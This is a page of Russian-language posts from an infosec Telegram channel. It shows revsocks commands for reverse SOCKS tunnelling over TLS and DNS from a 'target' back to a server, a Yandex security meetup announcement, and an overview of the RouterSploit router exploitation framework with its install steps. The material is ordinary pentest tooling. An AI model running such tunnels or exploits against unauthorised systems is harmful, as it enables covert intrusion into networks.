⏺️SOCKS5-запросы от сервера передаются через туннель к клиенту, который выполняет их и возвращает данные.


💻 Использование:
Обратное TCP соединение с шифрованием TLS:
# Start on VPS
revsocks -listen :8443 -socks 127.0.0.1:1080 -pass SuperSecretPassword -tls
# Start on client
revsocks -connect clientIP:8443 -pass SuperSecretPassword -tls


DNS туннель:
# Start on the DNS server
revsocks -dns example.com -dnslisten :53 -socks 127.0.0.1:1080 -pass <pass>
# Start on the target
revsocks -dns example.com -pass <pass>

Читать полностью…

Codeby

Вечерний митап Яндекса для security-инженеров

📅 Приглашаем присоединиться к Security Party 3 апреля

Наша команда информационной безопасности проведёт экскурсию по офису Яндекса и поделится своим опытом. В программе три выступления: обсудим фиды с уязвимостями и SBOM, автоматизацию управления доступами и внедрение kyverno.

✨ После официальной части — нетворкинг и фуршет

Подписывайтесь на профильные каналы Яндекса, чтобы ничего не пропустить:

🔸 Yandex for Security — основной хаб, в котором наши инженеры рассказывают о своих командах и важных мероприятиях

🔸 Охота за ошибками — канал для тех, кто интересуется нашей программой багбаунти

Читать полностью…

Codeby

Что такое RouterSploit?

RouterSploit — это открытый фреймворк для тестирования сетевых устройств на наличие уязвимостей. Он написан на Python и предлагает набор инструментов для сканирования, тестирования и эксплуатации уязвимостей. RouterSploit позволяет находить уязвимости как в домашних маршрутизаторах, так и в корпоративных сетевых устройствах, таких как коммутаторы, точки доступа и межсетевые экраны.


Этот инструмент вдохновлен популярным Metasploit Framework, но сосредоточен исключительно на устройствах сетевого уровня.

Основные возможности RouterSploit
1️⃣ Модули для эксплуатации уязвимостей:
RouterSploit включает модули, которые эксплуатируют известные уязвимости в прошивках сетевых устройств. Это позволяет проверить устройства на наличие незащищенных конфигураций или программных ошибок.
2️⃣ Модуль для сканирования
RouterSploit может сканировать сеть и идентифицировать устройства, их модели и версии прошивок.
3️⃣ Брутфорс-атаки:
Поддерживается автоматизированный подбор логинов и паролей для доступа к устройствам через протоколы Telnet, SSH, HTTP и другие.
4️⃣ Модули пост-эксплуатации:
После успешной атаки можно использовать дополнительные возможности, такие как захват данных, изменение конфигурации или запуск вредоносного кода.
5️⃣ Поддержка множества производителей:
Инструмент поддерживает устройства от компаний Cisco, MikroTik, Netgear, D-Link, TP-Link, Huawei, Juniper и многих других.

Архитектура и структура

RouterSploit разделен на несколько категорий модулей:
➡️ Exploit (Эксплуатация уязвимостей):
Модули, которые используют известные уязвимости, такие как обход авторизации, RCE (удаленное выполнение кода) или переполнение буфера.
➡️ Creds (Подбор учетных данных):
Модули для брутфорса учетных данных и проверки слабых паролей.
➡️ Scanners (Сканеры):
Автоматизированные модули для сканирования сетей и поиска уязвимых устройств.
➡️ Payloads (Полезная нагрузка):
Модули для выполнения кода или изменений конфигурации после успешной эксплуатации.
➡️ Generic (Общие модули):
Модули, которые не зависят от производителя или типа устройства.

⬇️ Установка RouterSploit
Инструмент доступен для систем на базе Linux, macOS и Windows.

1️⃣ Клонирование репозитория:
git clone https://github.com/threat9/routersploit.git
cd routersploit


2️⃣ Установка зависимостей:
pip install -r requirements.txt


3️⃣ Запуск RouterSploit:
python3 rsf.py


После запуска пользователь вы попадете в интерактивную оболочку, похожую на Metasploit.

Читать полностью…
Subscribe to a channel